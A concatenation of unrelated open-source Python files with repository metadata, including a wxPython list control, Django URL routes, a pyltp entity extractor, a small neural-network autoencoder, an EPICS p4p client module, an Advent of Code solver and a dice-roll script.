elif self.selection > nr - 1:
self.selection = nr - 1
else:
                # Needed to force a repaint of the selection
self.selection = self.selection
self.Refresh()
#-------------------------------------------------------------------------------------
    # data property
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = value
self._currentSort = None
self.SortByCol()
evt = myEvent(idx=self.GetId(), ctrl=self)
self.GetEventHandler().ProcessEvent(evt)
#-------------------------------------------------------------------------------------
    # selection property and associated events
@property
def selection(self):
return self._selected
@selection.setter
def selection(self,item=None):
if not(item is None):
if len(self._data) > item:
self.SetItemState(item, wx.LIST_STATE_SELECTED,#|wx.LIST_STATE_FOCUSED,
wx.LIST_STATE_SELECTED)#|wx.LIST_STATE_FOCUSED)
self.EnsureVisible(item)
else:
item = None
self._selected = item
#-------------------------------------------------------------------------------------
    # selectedItem property
@property
def selectedItem(self):
if self._selected is None:
return None
else:
return self._data[self._selected]
#-------------------------------------------------------------------------------------
    # Events
def _onItemSelected(self, event):
self._selected = event.GetIndex()
event.Skip()
def _onItemActivated(self, event):
self._selected = event.GetIndex()
event.Skip()
def _onItemDeselected(self, event):
self._selected = None
event.Skip()
def _onColClick(self, event):
col = event.GetColumn()
if col == self._currentSort:
self._data.reverse()
else:
self._data.sortByHeader(self.headers[col])
self._currentSort = col
self.UpdateView()
event.Skip() | cer1969/py-cer-widgets | listctrl/listctrl.py | listctrl.py | py | 5,512 | python | en | code | 1 | github-code | 13 |
24090946202 | from django.urls import path
# Create urls here
from apencil.api.views import (
# Authentication
SignUpEndpoint,
SignInEndpoint,
BookViewSet,
)
urlpatterns = [
# Auth
path("sign-up/", SignUpEndpoint.as_view(), name="sign-up"),
path("sign-in/", SignInEndpoint.as_view(), name="sign-in"),
# Book
path("books/", BookViewSet.as_view({"get": "list", "post": "create",}), name="book"),
path(
"books/<str:name>/",
BookViewSet.as_view(
{
"get": "retrieve",
"put": "update",
"patch": "partial_update",
"delete": "destroy",
}
),
name="book",
),
] | iamshaynez/apencil | apiserver/apencil/api/urls.py | urls.py | py | 703 | python | en | code | 0 | github-code | 13 |
24984459289 | import os
import jieba
from pyltp import NamedEntityRecognizer, Segmentor, \
Postagger, CustomizedSegmentor, \
Parser, SementicRoleLabeller, SentenceSplitter
class HLT(object):
def __init__(self, model_path):
self.model_path = model_path
self.cws_model_file = os.path.join(self.model_path, 'cws.model')
self.pos_model_file = os.path.join(self.model_path, 'pos.model')
self.ner_model_file = os.path.join(self.model_path, 'ner.model')
self.par_model_file = os.path.join(self.model_path, 'parser.model')
self.srl_model_file = os.path.join(self.model_path, 'pisrl_win.model')
def seg(self, txt):
        # word segmentation
        segmentor = Segmentor()  # create the instance
        segmentor.load(self.cws_model_file)  # load the model
        words = segmentor.segment(txt)  # run segmentation
        words_list = list(words)  # words_list holds the segmentation result
        segmentor.release()  # release the model
return words_list
def pos(self, txt):
        # part-of-speech tagging
        postagger = Postagger()  # create the instance
        postagger.load(self.pos_model_file)  # load the model
        postags = postagger.postag(txt)  # run POS tagging
        postags_list = list(postags)  # postags_list holds the POS tagging result
        postagger.release()  # release the model
return postags_list
def net(self, word, post):
        # named entity recognition
        recognizer = NamedEntityRecognizer()  # create the instance
        recognizer.load(self.ner_model_file)  # load the model
        netags = recognizer.recognize(word, post)  # run NER
        netags_list = list(netags)  # netags_list holds the NER result
        recognizer.release()  # release the model
return netags_list
# def par(self, word, post):
    # parser = Parser()  # create the instance
    # parser.load(self.par_model_file)  # load the model
    # arcs = parser.parse(word, post)  # dependency parsing
#
# rely_id = [arc.head for arc in arcs]
# relation = [arc.relation for arc in arcs]
# heads = ['ROOT' if id == 0 else word[id - 1] for id in rely_id]
# # print([(word[arc.head - 1], arc.relation, word[i]) for i, arc in enumerate(arcs)])
# # # print(heads)
# for i in range(len(word)):
# print(relation[i] + '(' + word[i] + ', ' + heads[i] + ')')
    # parser.release()  # release the model
#
# return arcs
# def srl(self, word, post, arcs):
    # labeller = SementicRoleLabeller()  # create the instance
    # labeller.load(self.srl_model_file)  # load the model
    # # arcs uses the result of the dependency parse
    # roles = labeller.label(word, post, arcs)  # semantic role labeling
# for role in roles:
# tmp = ["%s:[%d %d] %s" % (arg.name, arg.range.start, arg.range.end,
# ''.join(word[arg.range.start:arg.range.end])) for arg in role.arguments]
#
# # print(word[role.index], role.index, "".join(tmp))
    # labeller.release()  # release the model
def start(self, txt):
w_list, p_list, n_list = [], [], []
words_list = self.seg(txt)
# words_list = self.cus_seg(txt)
postags_list = self.pos(words_list)
netags_list = self.net(words_list, postags_list)
w_len = len(words_list)
for i in range(w_len):
# print(words_list[i], postags_list[i], netags_list[i])
if netags_list[i] != 'O':
                # segmentation result
                w_list.append(words_list[i])
                # POS tagging result
                p_list.append(postags_list[i])
                # NER result
                n_list.append(netags_list[i])
        a1 = len(w_list)
        # extract organization names (the 'Ni' tag marks institutions)
        i = 0
        organizations = []
        while i < a1:
            if n_list[i] == 'S-Ni':
                organizations.append(w_list[i])
            elif n_list[i] == 'B-Ni':
                temp_s = ''
                temp_s += w_list[i]
                j = i + 1
                while j < a1 and (n_list[j] == 'I-Ni' or n_list[j] == 'E-Ni'):
                    temp_s += w_list[j]
                    j += 1
                organizations.append(temp_s)
            i += 1
        # drop duplicate organization names, keeping first-seen order
        return list(dict.fromkeys(organizations))
if __name__ == '__main__':
model_path = './model/ltp_data_v3.4.0'
txt = '''招标人: 定边县教育和体育局 招标代理机构: 陕西新世纪工程管理咨询有限公司\n地址: 定边县东正街41号县政府大院 地址: 榆林市开发区沙河口市场世纪嘉兴 酒店五楼\n联系人: 陈世军 联系人: 郭秀梅\n电话: 0912-4215408 电话: 0912-2256048\n邮编: 邮编: \n开户银行: 开户银行: 中国银行股份有限公司榆林肤施路支行\n账号: 账号: 103605790456'''
htl = HLT(model_path)
res = htl.start(txt)
print(res)
| imlifeilong/myner | hitner/utils.py | utils.py | py | 5,038 | python | en | code | 0 | github-code | 13 |
6520124361 | import numpy as np
from datasets import encoder_data
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
class TLP():
"""Two layer perceptron class. d is the dimension of input,
M is the dimension of output and h is the number of hidden nodes."""
def __init__(self, d, M, nodes):
self.W = np.random.rand(d+1, nodes)
self.V = np.random.rand(nodes+1, M)
self.Theta = np.zeros([d+1, nodes])
self.Psi = np.zeros([nodes+1, M])
def forward(self, X):
H_star = np.dot(X, self.W)
H = self.activation(H_star)
H = np.concatenate((np.ones(X.shape[0]).reshape(-1, 1), H), axis = 1)
O_star = np.dot(H, self.V)
O = self.activation(O_star)
return H, H_star, O, O_star
def backward(self, T, O,H):
delta_out = (O - T)*self.d_activation(O)
delta_hidden = np.dot(delta_out, self.V[1:].T)*self.d_activation(H[:,1:])
return delta_out, delta_hidden
def fit(self, X, T, epochs, eta = 0.01, alpha = None, verbose = False, plot = True):
"""Backprop algorithm."""
E = np.zeros(epochs)
X = np.concatenate((np.ones(X.shape[0]).reshape(-1, 1), X), axis=1)
for epoch in range(epochs):
H, H_star, O, O_star = self.forward(X)
delta_out, delta_hidden = self.backward(T, O, H)
E[epoch] = 0.5*np.einsum('ij, ij', O-T, O-T)
if verbose and epoch%500==0:
print('error for iteration %i: %f' %(epoch ,E[epoch]))
# if momentum
if alpha:
self.Theta = alpha*self.Theta - (1 - alpha)*np.dot(X.T, delta_hidden)
self.Psi = alpha*self.Psi - (1 - alpha)*np.dot(H.T, delta_out)
self.W = self.W + eta*self.Theta
self.V = self.V + eta*self.Psi
# if no momentum
else:
self.W = self.W - eta*np.dot(X.T, delta_hidden)
self.V = self.V - eta*np.dot(H.T, delta_out)
if plot:
plt.plot(np.arange(epochs), E)
plt.xlabel('Epochs')
plt.ylabel('MSE')
plt.show()
def predict(self, X):
        X = np.concatenate((np.ones(X.shape[0]).reshape(-1, 1), X), axis=1)  # use X.shape[0] rather than the global N
H, H_star, O, O_star = self.forward(X)
return H, O
def activation(self, z):
return 2/(1 + np.exp(-z)) - 1
def d_activation(self, a):
"""a is an activation from activation()"""
# todo: is this a good idea?
return 0.5*(1 + a)*(1 - a)
N = 8
X, T = encoder_data(N)
M, d = T.shape
hidden_nodes = 3
epochs = 15000
eta = 0.01
tlp = TLP(d, M, hidden_nodes)
tlp.fit(X, T, epochs, eta, plot = False)
H, Y = tlp.predict(X)
H = H[:, 1:] # remove bias column
print('output: ')
print(np.round(Y))
H_sign = np.sign(H)
print('3D representation: ')
print(H_sign)
print('weight matrix: ')
print(tlp.W)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(H_sign[:,0], H_sign[:,1], H_sign[:,2], c = 'r')
plt.savefig('encoder_hidden.png')  # filename is an assumption; the original call omitted the required fname
plt.show()
| AlexHermansson/ANN_lab1 | encoder.py | encoder.py | py | 3,053 | python | en | code | 0 | github-code | 13 |
13514423036 | from ebcli.containers.generic_container import GenericContainer
from ebcli.objects.exceptions import NotFoundError, ValidationError
from mock import patch, Mock
from unittest import TestCase
MOCK_DESTINATION_DOCKERFILE = '/foo'
class TestGenericContainer(TestCase):
def setUp(self):
self.pathconfig = Mock()
self.fs_handler = Mock(pathconfig=self.pathconfig)
self.fs_handler.make_dockerfile = Mock()
self.fs_handler.dockerrun = None
self.container = GenericContainer(self.fs_handler, None, None, None)
def test_validate_no_dockerfile_or_dockerrun(self):
self.pathconfig.dockerfile_exists = lambda: False
self.pathconfig.dockerrun_exists = lambda: False
self.assertRaises(NotFoundError, self.container.validate)
@patch('ebcli.containers.generic_container.dockerrun.validate_dockerrun_v1')
def test_validate_dockerrun_validation_fail(self, validate_dockerrun_v1):
self.pathconfig.dockerfile_exists = lambda: True
validate_dockerrun_v1.side_effect = ValidationError
self.assertRaises(ValidationError, self.container.validate)
def test_containerize(self):
self.pathconfig.dockerfile_exists = lambda: True
container = GenericContainer(self.fs_handler, None, None)
container._containerize()
self.fs_handler.make_dockerfile.assert_called_once_with()
| aws/aws-elastic-beanstalk-cli | tests/unit/containers/test_generic_container.py | test_generic_container.py | py | 1,392 | python | en | code | 150 | github-code | 13 |
37473394734 | EAST = 0
SOUTHEAST = 1
SOUTHWEST = 2
WEST = 3
NORTHWEST = 4
NORTHEAST = 5
NUM_DIRECTIONS = 6
#Tile X == normal x
#Tile Y = zigzagging vertically
#origin is in the right zigzag column
# \ \
# / /
# \ \ v +y ->+x
# / /
def GetTileInDirection(pos, direction):
if direction == EAST:
return (pos[0]+1,pos[1])
elif direction == WEST:
return (pos[0]-1,pos[1])
inRightCol = pos[1]%2==0
if inRightCol:
if direction == SOUTHEAST:
return (pos[0]+1,pos[1]+1)
elif direction == SOUTHWEST:
return (pos[0],pos[1]+1)
elif direction == NORTHWEST:
return (pos[0],pos[1]-1)
elif direction == NORTHEAST:
return (pos[0]+1,pos[1]-1)
else:
if direction == SOUTHEAST:
return (pos[0],pos[1]+1)
elif direction == SOUTHWEST:
return (pos[0]-1,pos[1]+1)
elif direction == NORTHWEST:
return (pos[0]-1,pos[1]-1)
elif direction == NORTHEAST:
return (pos[0],pos[1]-1)
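
# Added orientation check (not in the original): starting from (0, 0), which
# sits in a "right" zigzag column (y % 2 == 0), the scheme above gives
# EAST -> (1, 0), WEST -> (-1, 0), SOUTHWEST -> (0, 1), NORTHEAST -> (1, -1).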
def GetNumAdjacent(flippedTiles, pos):
count = 0
for direction in range(NUM_DIRECTIONS):
testTile = GetTileInDirection(pos, direction)
if testTile in flippedTiles:
count += 1
return count
input = []
with open("input.txt") as FILE:
INPUTSTATE_NORMAL = 0
INPUTSTATE_PENDING_NORTH = 1
INPUTSTATE_PENDING_SOUTH = 2
for line in FILE:
line = line.strip()
if len(line) == 0:
continue
directions = []
inputState = INPUTSTATE_NORMAL
for c in line:
if inputState == INPUTSTATE_NORMAL:
if c == 'e':
directions.append(EAST)
elif c == 'w':
directions.append(WEST)
elif c == 'n':
inputState = INPUTSTATE_PENDING_NORTH
elif c == 's':
inputState = INPUTSTATE_PENDING_SOUTH
elif inputState == INPUTSTATE_PENDING_NORTH:
if c == 'e':
directions.append(NORTHEAST)
elif c == 'w':
directions.append(NORTHWEST)
inputState = INPUTSTATE_NORMAL
elif inputState == INPUTSTATE_PENDING_SOUTH:
if c == 'e':
directions.append(SOUTHEAST)
elif c == 'w':
directions.append(SOUTHWEST)
inputState = INPUTSTATE_NORMAL
input.append(directions)
#Part A
flippedTiles = set()
for directions in input:
currentTile = (0,0)
for direction in directions:
currentTile = GetTileInDirection(currentTile, direction)
if currentTile in flippedTiles:
flippedTiles.remove(currentTile)
else:
flippedTiles.add(currentTile)
print(len(flippedTiles))
#Part B
for i in range(100):
newFlippedTiles = set(flippedTiles)
minX = 0
maxX = 0
minY = 0
maxY = 0
for tile in flippedTiles:
if tile[0] < minX:
minX = tile[0]
if tile[0] > maxX:
maxX = tile[0]
if tile[1] < minY:
minY = tile[1]
if tile[1] > maxY:
maxY = tile[1]
for y in range(minY-1,maxY+2):
for x in range(minX-1,maxX+2):
testTile = (x,y)
isFlipped = testTile in flippedTiles
numAdjacent = GetNumAdjacent(flippedTiles, testTile)
if isFlipped and (numAdjacent == 0 or numAdjacent > 2):
newFlippedTiles.remove(testTile)
elif (not isFlipped) and (numAdjacent == 2):
newFlippedTiles.add(testTile)
flippedTiles = newFlippedTiles
print(len(flippedTiles))
| Chromega/adventofcode | 2020/Day24/day24.py | day24.py | py | 3,786 | python | en | code | 0 | github-code | 13 |
11193176216 | # modified version of binary search that returns the index
# within a sorted sequence indicating where the target
# should be located
def findSortedPosition( theList, target):
low = 0
high = len(theList) - 1
while low <= high:
mid = (low+high)//2
if theList[mid] == target:
return mid # index of the target
elif theList[mid] > target:
high = mid - 1
else:
low = mid + 1
return low # index where the target value should be
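
# Added demo (not in the original file):
# findSortedPosition([1, 3, 5, 7], 5) -> 2 (index of the target), and
# findSortedPosition([1, 3, 5, 7], 4) -> 2 (where 4 would be inserted).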
| Shaunwei/Python4Fun | algorithmAndDataS/SearchingAndSorting/findSortedPosition.py | findSortedPosition.py | py | 522 | python | en | code | 0 | github-code | 13 |
24823123662 | from __future__ import annotations
from plumbum import cli # type: ignore
from pathlib import Path
from quangis_workflows.namespace import CCD, EM, EX
from quangis_workflows.generator import WorkflowGenerator
from quangis_workflows.types import Polytype
sources = [
(CCD.FieldQ, CCD.VectorTessellationA, CCD.PlainNominalA), # VectorCoverage
(CCD.FieldQ, CCD.VectorTessellationA, CCD.PlainOrdinalA), # Contour
(CCD.FieldQ, CCD.PointA, CCD.PlainIntervalA), # PointMeasures
(CCD.FieldQ, CCD.PointA, CCD.PlainRatioA), # PointMeasures
(CCD.FieldQ, CCD.LineA, CCD.PlainIntervalA), # LineMeasures (isolines)
(CCD.FieldQ, CCD.LineA, CCD.PlainRatioA), # LineMeasures (isolines)
(CCD.FieldQ, CCD.PlainVectorRegionA, CCD.PlainNominalA), # Patch
(CCD.FieldQ, CCD.RasterA, CCD.PlainIntervalA), # Field Raster
(CCD.FieldQ, CCD.RasterA, CCD.PlainRatioA), # Field Raster
# Commented out because there are actually no tools which accept this
# input, which makes APE very very mad.
# (CCD.AmountQ, CCD.RasterA, CCD.CountA), # Count Raster
# (CCD.AmountQ, CCD.PlainVectorRegionA, CCD.CountA), # Count Vector
# (CCD.AmountQ, CCD.PointA, CCD.CountA), # Count Vector
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.PlainNominalA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.PlainOrdinalA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.PlainIntervalA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, EM.ERA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, EM.IRA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.PlainRatioA), # Lattice
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.CountA), # Lattice
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.PlainNominalA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.PlainOrdinalA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.PlainIntervalA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, EM.ERA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, EM.IRA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.PlainRatioA), # ObjectRegion
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.CountA), # ObjectRegion
(CCD.ObjectQ, CCD.PointA, CCD.PlainNominalA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, CCD.PlainOrdinalA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, CCD.PlainIntervalA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, EM.ERA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, EM.IRA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, CCD.PlainRatioA), # ObjectPoint
(CCD.ObjectQ, CCD.PointA, CCD.CountA), # ObjectPoint
]
goals = [
(CCD.FieldQ, CCD.PlainVectorRegionA, CCD.NominalA),
(CCD.FieldQ, CCD.VectorTessellationA, CCD.NominalA),
(CCD.FieldQ, CCD.VectorTessellationA, CCD.OrdinalA),
(CCD.FieldQ, CCD.RasterA, CCD.IntervalA),
(CCD.FieldQ, CCD.RasterA, CCD.RatioA),
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.IntervalA),
(CCD.ObjectQ, CCD.VectorTessellationA, EM.ERA),
(CCD.ObjectQ, CCD.VectorTessellationA, EM.IRA),
(CCD.ObjectQ, CCD.VectorTessellationA, CCD.CountA),
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.IntervalA),
(CCD.ObjectQ, CCD.PlainVectorRegionA, EM.ERA),
(CCD.ObjectQ, CCD.PlainVectorRegionA, EM.IRA),
(CCD.ObjectQ, CCD.PlainVectorRegionA, CCD.CountA),
]
def generate_workflows() -> None:
"""
Generate workflows using APE with the CCD type taxonomy and the GIS tool
ontology.
"""
build_dir = Path(__file__).parent / "build"
gen = WorkflowGenerator(build_dir)
# To start with, we generate workflows with two inputs and one output, of
# which one input is drawn from the following sources, and the other is the
# same as the output without the measurement level.
inputs_outputs: list[tuple[str, list[Polytype], list[Polytype]]] = []
for goal_tuple in goals:
goal = Polytype(gen.dimensions, goal_tuple)
source1 = Polytype(goal)
source1[CCD.NominalA] = {CCD.NominalA}
for source_tuple in sources:
source2 = Polytype(gen.dimensions, source_tuple)
inputs_outputs.append((
f"{source1.short()}+{source2.short()}_{goal.short()}_",
[source1, source2], [goal]))
running_total = 0
for run, (name, inputs, outputs) in enumerate(inputs_outputs):
for solution in gen.run(inputs, outputs, solutions=1, prefix=EX[name]):
running_total += 1
path = build_dir / f"solution{running_total}.ttl"
print(f"Writing solution: {path}")
solution.serialize(path, format="ttl")
class CLI(cli.Application):
"""
Generate workflows using APE with the CCD type taxonomy and the GIS tool
ontology.
"""
PROGNAME = "quangis-wf-gen"
def main(self, *args):
generate_workflows()
def main():
CLI.run()
if __name__ == '__main__':
main()
| quangis/quangis-workflows | quangis_workflows/cli/wf_gen.py | wf_gen.py | py | 4,947 | python | en | code | 0 | github-code | 13 |
17531004519 |
from __future__ import print_function
import logging
import sys
_log = logging.getLogger(__name__)
try:
from itertools import izip
except ImportError:
izip = zip
from functools import partial
import json
import threading
try:
from Queue import Queue, Full, Empty
except ImportError:
from queue import Queue, Full, Empty
from . import raw
from .raw import Disconnected, RemoteError, Cancelled, Finished
from ..util import _defaultWorkQueue
from ..wrapper import Value, Type
from ..rpc import WorkQueue
from .._p4p import (logLevelAll, logLevelTrace, logLevelDebug,
logLevelInfo, logLevelWarn, logLevelError,
logLevelFatal, logLevelOff)
__all__ = [
'Context',
'Value',
'Type',
'RemoteError',
'TimeoutError',
]
if sys.version_info >= (3, 0):
unicode = str
TimeoutError = TimeoutError
else:
class TimeoutError(RuntimeError):
"Local timeout has expired"
def __init__(self):
RuntimeError.__init__(self, 'Timeout')
class Subscription(object):
"""An active subscription.
Returned by `Context.monitor`.
"""
def __init__(self, ctxt, name, cb, notify_disconnect=False, queue=None):
self.name, self._S, self._cb = name, None, cb
self._notify_disconnect = notify_disconnect
self._Q = queue or ctxt._Q or _defaultWorkQueue()
if notify_disconnect:
# all subscriptions are inittially disconnected
self._Q.push_wait(partial(cb, Disconnected()))
def close(self):
"""Close subscription.
"""
if self._S is not None:
# after .close() self._event should never be called
self._S.close()
self._S = None
def __enter__(self):
return self
def __exit__(self, A, B, C):
self.close()
@property
def done(self):
'Has all data for this subscription been received?'
return self._S is None or self._S.done()
@property
def empty(self):
'Is data pending in event queue?'
return self._S is None or self._S.empty()
def _event(self):
try:
assert self._S is not None, self._S
_log.debug('Subscription wakeup for %s', self.name)
self._Q.push(self._handle)
except:
_log.exception("Lost Subscription update for %s", self.name)
def _handle(self):
try:
S = self._S
if S is None: # already close()'d
return
for n in range(4):
E = S.pop()
if E is None:
break # monitor queue empty
elif isinstance(E, Exception):
_log.debug('Subscription notify for %s with %s', self.name, E)
if self._notify_disconnect:
self._cb(E)
elif isinstance(E, RemoteError):
_log.error("Subscription Error %s", E)
if isinstance(E, Finished):
_log.debug('Subscription complete %s', self.name)
self._S = None
S.close()
else:
self._cb(E)
if E is not None:
# removed 4 elements without emptying queue
# re-schedule to mux with others
self._Q.push(self._handle)
except:
_log.exception("Error processing Subscription event for %s", self.name)
if self._S is not None:
self._S.close()
self._S = None
class Context(raw.Context):
"""Context(provider, conf=None, useenv=True)
:param str provider: A Provider name. Try "pva" or run :py:meth:`Context.providers` for a complete list.
:param dict conf: Configuration to pass to provider. Depends on provider selected.
:param bool useenv: Allow the provider to use configuration from the process environment.
:param int workers: Size of thread pool in which monitor callbacks are run. Default is 4
:param int maxsize: Size of internal work queue used for monitor callbacks. Default is unlimited
:param dict nt: Controls :ref:`unwrap`. None uses defaults. Set False to disable
:param dict unwrap: Legacy :ref:`unwrap`.
:param WorkQueue queue: A work queue through which monitor callbacks are dispatched.
The methods of this Context will block the calling thread until completion or timeout
The meaning, and allowed keys, of the configuration dictionary depend on the provider.
conf= will override values taken from the process environment. Pass useenv=False to
ensure that environment variables are completely ignored.
The "pva" provider understands the following keys:
* EPICS_PVA_ADDR_LIST
* EPICS_PVA_AUTO_ADDR_LIST
* EPICS_PVA_SERVER_PORT
* EPICS_PVA_BROADCAST_PORT
"""
Value = Value
name = ''
"Provider name string"
def __init__(self, provider='pva', conf=None, useenv=True, nt=None, unwrap=None,
maxsize=0, queue=None):
self._channel_lock = threading.Lock()
super(Context, self).__init__(provider, conf=conf, useenv=useenv, nt=nt, unwrap=unwrap)
# lazy start threaded WorkQueue
self._Q = self._T = None
self._Q = queue
def _channel(self, name):
with self._channel_lock:
return super(Context, self)._channel(name)
def disconnect(self, *args, **kws):
with self._channel_lock:
super(Context, self).disconnect(*args, **kws)
def _queue(self):
if self._Q is None:
Q = WorkQueue(maxsize=self._Qmax)
Ts = []
for n in range(self._Wcnt):
T = threading.Thread(name='p4p Context worker', target=Q.handle)
T.daemon = True
Ts.append(T)
for T in Ts:
T.start()
_log.debug('Started %d Context worker', self._Wcnt)
self._Q, self._T = Q, Ts
return self._Q
def close(self):
"""Force close all Channels and cancel all Operations
"""
if self._Q is not None:
for T in self._T:
self._Q.interrupt()
for n, T in enumerate(self._T):
_log.debug('Join Context worker %d', n)
T.join()
_log.debug('Joined Context workers')
self._Q, self._T = None, None
if not Context:
# Python 2.7 GC removes Context from scope during destruction of objects.
return
super(Context, self).close()
def get(self, name, request=None, timeout=5.0, throw=True):
"""Fetch current value of some number of PVs.
:param name: A single name string or list of name strings
:param request: A :py:class:`p4p.Value` or string to qualify this request, or None to use a default.
:param float timeout: Operation timeout in seconds
:param bool throw: When true, operation error throws an exception. If False then the Exception is returned instead of the Value
:returns: A p4p.Value or Exception, or list of same. Subject to :py:ref:`unwrap`.
When invoked with a single name then returns is a single value.
When invoked with a list of name, then returns a list of values
>>> ctxt = Context('pva')
>>> V = ctxt.get('pv:name')
>>> A, B = ctxt.get(['pv:1', 'pv:2'])
>>>
"""
singlepv = isinstance(name, (bytes, unicode))
if singlepv:
name = [name]
request = [request]
elif request is None:
request = [None] * len(name)
assert len(name) == len(request), (name, request)
# use Queue instead of Event to allow KeyboardInterrupt
done = Queue()
result = [TimeoutError()] * len(name)
ops = [None] * len(name)
raw_get = super(Context, self).get
try:
for i, (N, req) in enumerate(izip(name, request)):
def cb(value, i=i):
try:
if not isinstance(value, Cancelled):
done.put_nowait((value, i))
_log.debug('get %s Q %r', N, value)
except:
_log.exception("Error queuing get result %s", value)
_log.debug('get %s w/ %s', N, req)
ops[i] = raw_get(N, cb, request=req)
for _n in range(len(name)):
try:
value, i = done.get(timeout=timeout)
except Empty:
if throw:
_log.debug('timeout %s after %s', name[i], timeout)
raise TimeoutError()
break
_log.debug('got %s %r', name[i], value)
if throw and isinstance(value, Exception):
raise value
result[i] = value
finally:
[op and op.close() for op in ops]
if singlepv:
return result[0]
else:
return result
def put(self, name, values, request=None, timeout=5.0, throw=True,
process=None, wait=None, get=True):
"""Write a new value of some number of PVs.
:param name: A single name string or list of name strings
:param values: A single value, a list of values, a dict, a `Value`. May be modified by the constructor nt= argument.
:param request: A :py:class:`p4p.Value` or string to qualify this request, or None to use a default.
:param float timeout: Operation timeout in seconds
:param bool throw: When true, operation error throws an exception.
If False then the Exception is returned instead of the Value
:param str process: Control remote processing. May be 'true', 'false', 'passive', or None.
:param bool wait: Wait for all server processing to complete.
:param bool get: Whether to do a Get before the Put. If True then the value passed to the builder callable
will be initialized with recent PV values. eg. use this with NTEnum to find the enumeration list.
:returns: A None or Exception, or list of same
When invoked with a single name then returns is a single value.
When invoked with a list of name, then returns a list of values
If 'wait' or 'process' is specified, then 'request' must be omitted or None.
>>> ctxt = Context('pva')
>>> ctxt.put('pv:name', 5.0)
>>> ctxt.put(['pv:1', 'pv:2'], [1.0, 2.0])
>>> ctxt.put('pv:name', {'value':5})
>>>
The provided value(s) will be automatically coerced to the target type.
If this is not possible then an Exception is raised/returned.
Unless the provided value is a dict, it is assumed to be a plain value
and an attempt is made to store it in '.value' field.
"""
singlepv = isinstance(name, (bytes, unicode))
if request and (process or wait is not None):
raise ValueError("request= is mutually exclusive to process= or wait=")
elif process or wait is not None:
request = 'field()record[block=%s,process=%s]' % ('true' if wait else 'false', process or 'passive')
if not singlepv:
request = [request]*len(name)
if singlepv:
name = [name]
values = [values]
request = [request]
elif request is None:
request = [None] * len(name)
assert len(name) == len(request), (name, request)
assert len(name) == len(values), (name, values)
# use Queue instead of Event to allow KeyboardInterrupt
done = Queue()
result = [TimeoutError()] * len(name)
ops = [None] * len(name)
raw_put = super(Context, self).put
try:
for i, (n, value, req) in enumerate(izip(name, values, request)):
if isinstance(value, (bytes, unicode)) and value[:1] == '{':
try:
value = json.loads(value)
except ValueError:
raise ValueError("Unable to interpret '%s' as json" % value)
# completion callback
def cb(value, i=i):
try:
done.put_nowait((value, i))
except:
_log.exception("Error queuing put result %r", value)
ops[i] = raw_put(n, cb, builder=value, request=req, get=get)
for _n in range(len(name)):
try:
value, i = done.get(timeout=timeout)
except Empty:
if throw:
raise TimeoutError()
break
if throw and isinstance(value, Exception):
raise value
result[i] = value
if singlepv:
return result[0]
else:
return result
finally:
[op and op.close() for op in ops]
def rpc(self, name, value, request=None, timeout=5.0, throw=True):
"""Perform a Remote Procedure Call (RPC) operation
:param str name: PV name string
:param Value value: Arguments. Must be Value instance
:param request: A :py:class:`p4p.Value` or string to qualify this request, or None to use a default.
:param float timeout: Operation timeout in seconds
:param bool throw: When true, operation error throws an exception.
If False then the Exception is returned instead of the Value
:returns: A Value or Exception. Subject to :py:ref:`unwrap`.
>>> ctxt = Context('pva')
        >>> ctxt.rpc('pv:name:add', {'A': 5, 'B': 6})
>>>
The provided value(s) will be automatically coerced to the target type.
If this is not possible then an Exception is raised/returned.
Unless the provided value is a dict, it is assumed to be a plain value
and an attempt is made to store it in '.value' field.
"""
done = Queue()
op = super(Context, self).rpc(name, done.put_nowait, value, request=request)
try:
try:
result = done.get(timeout=timeout)
except Empty:
result = TimeoutError()
if throw and isinstance(result, Exception):
raise result
return result
except:
op.close()
raise
def monitor(self, name, cb, request=None, notify_disconnect=False, queue=None):
"""Create a subscription.
:param str name: PV name string
:param callable cb: Processing callback
:param request: A :py:class:`p4p.Value` or string to qualify this request, or None to use a default.
:param bool notify_disconnect: In additional to Values, the callback may also be call with instances of Exception.
Specifically: Disconnected , RemoteError, or Cancelled
:param WorkQueue queue: A work queue through which monitor callbacks are dispatched.
:returns: a :py:class:`Subscription` instance
        The callable will be invoked with one argument which is either:
* A p4p.Value (Subject to :py:ref:`unwrap`)
* A sub-class of Exception (Disconnected , RemoteError, or Cancelled)
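
        Example (an added illustrative sketch, not from the original docs):

        >>> sub = ctxt.monitor('pv:name', print)
        >>> # ... later, once updates are no longer needed ...
        >>> sub.close()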
"""
R = Subscription(self, name, cb, notify_disconnect=notify_disconnect, queue=queue)
R._S = super(Context, self).monitor(name, R._event, request)
return R
| mdavidsaver/p4p | src/p4p/client/thread.py | thread.py | py | 15,778 | python | en | code | 20 | github-code | 13 |
38889852083 | #! python3
# a program to roll dice
from random import randint
from plotly.graph_objs import Bar,Layout
from plotly import offline
class Dice():
    """A class to roll dice """
    def __init__(self,dice_num=6):
        self.dice_num=dice_num
    def roll(self):
        """Rolling the dice"""
        return randint(1,self.dice_num)
if __name__=='__main__':
dice=Dice()
    #Make some rolls and store the results in a list
results=[]
for i in range(100000):
results.append(dice.roll())
    #Analyze the result
frequencies=[]
for i in range(1,dice.dice_num+1):
frequencies.append(results.count(i))
#Visualize the data with histogram
